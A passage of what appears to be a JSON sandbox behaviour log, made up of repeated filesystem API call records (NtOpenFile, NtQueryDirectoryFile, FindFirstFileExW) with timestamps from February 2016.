"NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,485", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,495", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,525", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,525", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,525", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,525", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,525", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,525", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,525", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,525", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,525", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,525", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,565", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,565", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,565", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,565", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,565", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,565", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,565", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,565", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,625", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,635", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,665", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,665", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,665", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,665", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,665", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,665", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,665", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,725", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,735", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,745", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,775", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,845", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,845", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,845", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,845", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,845", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,845", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:36,855", "api": 